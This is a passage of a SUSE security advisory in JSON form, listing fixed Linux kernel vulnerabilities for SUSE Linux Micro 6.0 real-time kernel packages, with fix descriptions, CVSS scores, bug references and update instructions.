"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: restore destructor on submit failure\n\nhandshake_req_submit() replaces sk-\u003esk_destruct but never restores it when\nsubmission fails before the request is hashed. handshake_sk_destruct() then\nreturns early and the original destructor never runs, leaking the socket.\nRestore sk_destruct on the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71148",
"url": "https://www.suse.com/security/cve/CVE-2025-71148"
},
{
"category": "external",
"summary": "SUSE Bug 1257159 for CVE-2025-71148",
"url": "https://bugzilla.suse.com/1257159"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71148"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2025-71182",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71182"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: j1939: make j1939_session_activate() fail if device is no longer registered\n\nsyzbot is still reporting\n\n unregister_netdevice: waiting for vcan0 to become free. Usage count = 2\n\neven after commit 93a27b5891b8 (\"can: j1939: add missing calls in\nNETDEV_UNREGISTER notification handler\") was added. A debug printk() patch\nfound that j1939_session_activate() can succeed even after\nj1939_cancel_active_session() from j1939_netdev_notify(NETDEV_UNREGISTER)\nhas completed.\n\nSince j1939_cancel_active_session() is processed with the session list lock\nheld, checking ndev-\u003ereg_state in j1939_session_activate() with the session\nlist lock held can reliably close the race window.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71182",
"url": "https://www.suse.com/security/cve/CVE-2025-71182"
},
{
"category": "external",
"summary": "SUSE Bug 1257586 for CVE-2025-71182",
"url": "https://bugzilla.suse.com/1257586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71182"
},
{
"cve": "CVE-2025-71184",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71184"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix NULL dereference on root when tracing inode eviction\n\nWhen evicting an inode the first thing we do is to setup tracing for it,\nwhich implies fetching the root\u0027s id. But in btrfs_evict_inode() the\nroot might be NULL, as implied in the next check that we do in\nbtrfs_evict_inode().\n\nHence, we either should set the -\u003eroot_objectid to 0 in case the root is\nNULL, or we move tracing setup after checking that the root is not\nNULL. Setting the rootid to 0 at least gives us the possibility to trace\nthis call even in the case when the root is NULL, so that\u0027s the solution\ntaken here.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71184",
"url": "https://www.suse.com/security/cve/CVE-2025-71184"
},
{
"category": "external",
"summary": "SUSE Bug 1257635 for CVE-2025-71184",
"url": "https://bugzilla.suse.com/1257635"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71184"
},
{
"cve": "CVE-2025-71185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: ti: dma-crossbar: fix device leak on am335x route allocation\n\nMake sure to drop the reference taken when looking up the crossbar\nplatform device during am335x route allocation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71185",
"url": "https://www.suse.com/security/cve/CVE-2025-71185"
},
{
"category": "external",
"summary": "SUSE Bug 1257560 for CVE-2025-71185",
"url": "https://bugzilla.suse.com/1257560"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71185"
},
{
"cve": "CVE-2025-71188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71188"
}
],
"notes": [
{
"category": "general",
